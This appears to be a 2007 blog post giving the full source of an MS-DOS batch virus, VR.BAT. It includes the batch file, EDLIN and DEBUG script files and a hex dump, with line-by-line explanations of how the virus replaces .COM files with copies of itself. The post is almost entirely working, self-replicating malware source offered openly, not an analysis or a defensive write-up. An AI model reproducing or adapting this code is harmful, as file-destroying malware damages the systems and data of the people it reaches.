Thursday, November 8, 2007

Batch Virus

Batch Virus?
This virus which we are about to see makes use of the MS-DOS operating system. This BATCH virus uses DEBUG & EDLIN programs.

NAME: VR.BAT

ECHO = OFF (Self explanatory)
CTTY NUL (This is important. Console output is turned off)
PATH C:\MSDOS (May differ on other systems)
DIR *.COM/W>IND (The directory is written on "ind" ONLY name entries)
EDLIN IND<1 ("ind" is processed with EDLIN so only file names appear)
DEBUG IND<2 (New batch program is created with debug)
EDLIN NAME.BAT<3 (This batch goes to an executable form because of EDLIN)
CTTY CON (Console interface is again assigned)
NAME (Newly created NAME.BAT is called)

In addition to this Batch file, there are command files, here named 1,2,3.
Here is the first command file:

NAME: 1




1,4D (Here line 1-4 of the "ind" file are deleted)
E (Save file)

Here is the second command file:

NAME: 2

M100,10B,F000 (First program name is moved to the F000H address to save)
E108".BAT" (Extension of file name is changed to .BAT)
M100,10B,F010 (File is saved again)
E100"DEL" (DEL Command is written to address 100H)
MF000,F00B,104 (Original file is written after this command)
E10C 2E (Period is placed in front of extension)
E110 0D,0A (Carriage return plus line feed)
MF010,F020,11F (Modified file is moved to 11FH address from buffer area)
E112"COPY\VR.BAT" (Copy command is now placed in front of file)
E12B 0D,0A (Copy command terminated with carriage return + line feed)
RXC (The CX register is ...)
2C (Set to 2CH)
NNAME.BAT (Name it NAME.BAT)
W (Write)
Q (Quit) The third command file must be printed as a hex dump because it contains
two control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:


NAME: 3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root. This
Program only affects .COM files.